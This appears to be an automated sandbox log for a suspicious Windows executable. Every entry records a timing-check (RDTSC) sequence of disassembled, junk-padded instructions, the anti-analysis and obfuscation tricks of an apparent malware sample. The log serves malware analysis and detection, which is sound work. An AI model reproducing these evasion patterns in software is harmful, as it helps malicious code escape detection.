Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7ABD5 second address: E7ABF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4BA0D39719h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7ABF7 second address: E7ABFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7ABFD second address: E7AC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F4BA0D3971Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7AD90 second address: E7ADA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7DF48 second address: E7DF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7DF4E second address: E7DF89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jns 00007F4BA0D3F156h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F4BA0D3F156h 0x0000001b jmp 00007F4BA0D3F15Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E14864 second address: E14868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E14868 second address: E14891 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F4BA0D3F15Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4BA0D3F163h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8342C second address: E83432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E83432 second address: E83453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F165h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F4BA0D3F156h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8202B second address: E8202F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8202F second address: E82039 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E825DB second address: E825E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E825E1 second address: E825E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E82785 second address: E8278B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8278B second address: E82790 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E82B91 second address: E82B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E82E80 second address: E82E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E362E6 second address: E36308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39719h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E0733D second address: E07353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E07353 second address: E07363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4BA0D39706h 0x0000000a jc 00007F4BA0D39706h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E88C95 second address: E88CAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F4BA0D3F156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F4BA0D3F15Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87AC6 second address: E87ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87ACA second address: E87AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87AD2 second address: E87AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87C39 second address: E87C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87C3F second address: E87C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E87C43 second address: E87C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F162h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8810C second address: E88112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E88568 second address: E8856E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E889CA second address: E889F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39715h 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F4BA0D3970Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E889F3 second address: E889F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E889F8 second address: E88A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E88A05 second address: E88A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8E807 second address: E8E823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8D6CA second address: E8D6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F4BA0D3F15Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8D6EB second address: E8D6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E560E0 second address: E56114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 js 00007F4BA0D3F159h 0x0000000f movsx ecx, dx 0x00000012 lea eax, dword ptr [ebp+12481EB9h] 0x00000018 jnp 00007F4BA0D3F15Ch 0x0000001e mov dword ptr [ebp+1246F4C0h], edx 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F4BA0D3F15Ah 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56114 second address: E56119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56119 second address: E56132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4BA0D3F156h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F4BA0D3F158h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56132 second address: E56138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56138 second address: E5613C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5613C second address: E3576D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call dword ptr [ebp+122D1E3Bh] 0x0000000f jbe 00007F4BA0D3973Eh 0x00000015 jns 00007F4BA0D3972Eh 0x0000001b jne 00007F4BA0D3970Ah 0x00000021 jl 00007F4BA0D39748h 0x00000027 pushad 0x00000028 jmp 00007F4BA0D39719h 0x0000002d jbe 00007F4BA0D39706h 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 push edx 0x00000036 pop edx 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5678A second address: E56790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56790 second address: E56795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56795 second address: E567B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E567B3 second address: E567D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F4BA0D39713h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E567D8 second address: E567DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E567DC second address: E56867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b js 00007F4BA0D39718h 0x00000011 jbe 00007F4BA0D39712h 0x00000017 jmp 00007F4BA0D3970Ch 0x0000001c pop eax 0x0000001d or dword ptr [ebp+124553B2h], ebx 0x00000023 mov ecx, 3D0C8D29h 0x00000028 call 00007F4BA0D39709h 0x0000002d push eax 0x0000002e jnl 00007F4BA0D3970Ch 0x00000034 pop eax 0x00000035 push eax 0x00000036 jmp 00007F4BA0D39712h 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f push ebx 0x00000040 jmp 00007F4BA0D39713h 0x00000045 pop ebx 0x00000046 mov eax, dword ptr [eax] 0x00000048 push eax 0x00000049 push edx 0x0000004a jnp 00007F4BA0D39715h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56867 second address: E5686D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56B5D second address: E56B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E56B63 second address: E56B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E570CF second address: E570D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5746B second address: E57480 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F4BA0D3F156h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E57480 second address: E574E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F4BA0D39708h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 pushad 0x00000023 mov bh, ch 0x00000025 mov ah, ECh 0x00000027 popad 0x00000028 lea eax, dword ptr [ebp+12481EFDh] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F4BA0D39708h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushad 0x0000004d popad 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E574E6 second address: E574EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E574EB second address: E57587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4BA0D39715h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4BA0D39708h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea eax, dword ptr [ebp+12481EB9h] 0x00000030 jmp 00007F4BA0D3970Ah 0x00000035 nop 0x00000036 pushad 0x00000037 jmp 00007F4BA0D39712h 0x0000003c pushad 0x0000003d jmp 00007F4BA0D39716h 0x00000042 jmp 00007F4BA0D39711h 0x00000047 popad 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jo 00007F4BA0D39708h 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E57587 second address: E362E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4BA0D3F158h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jmp 00007F4BA0D3F15Bh 0x00000028 call dword ptr [ebp+122D2947h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push edi 0x00000031 jmp 00007F4BA0D3F15Ah 0x00000036 pop edi 0x00000037 jmp 00007F4BA0D3F169h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8DAF0 second address: E8DAFF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4BA0D39708h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8DC62 second address: E8DC6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jno 00007F4BA0D3F156h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8DDF4 second address: E8DDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8DDF8 second address: E8DDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8E0C0 second address: E8E0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39717h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8E0DD second address: E8E0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007F4BA0D3F156h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F4BA0D3F15Bh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8E390 second address: E8E3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Fh 0x00000009 jmp 00007F4BA0D39717h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4BA0D39710h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E8E3CF second address: E8E3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E936D1 second address: E936E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F4BA0D39706h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E0DEC8 second address: E0DEF9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F4BA0D3F166h 0x00000019 js 00007F4BA0D3F156h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E0DEF9 second address: E0DEFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E93271 second address: E9329C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F4BA0D3F164h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E96057 second address: E9605B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9605B second address: E9605F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9B21A second address: E9B21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9B21F second address: E9B227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9B227 second address: E9B255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39713h 0x0000000d jmp 00007F4BA0D39713h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9B406 second address: E9B40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9B40C second address: E9B410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA14CB second address: EA14D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA14D7 second address: EA14DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA14DB second address: EA14F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F4BA0D3F156h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jno 00007F4BA0D3F156h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA14F7 second address: EA152C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39718h 0x00000008 jmp 00007F4BA0D39718h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: EA152C second address: EA1532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FE34 second address: E9FE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E9FE38 second address: E9FE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F4BA0D3F167h 0x00000014 popad 0x00000015 rdtsc
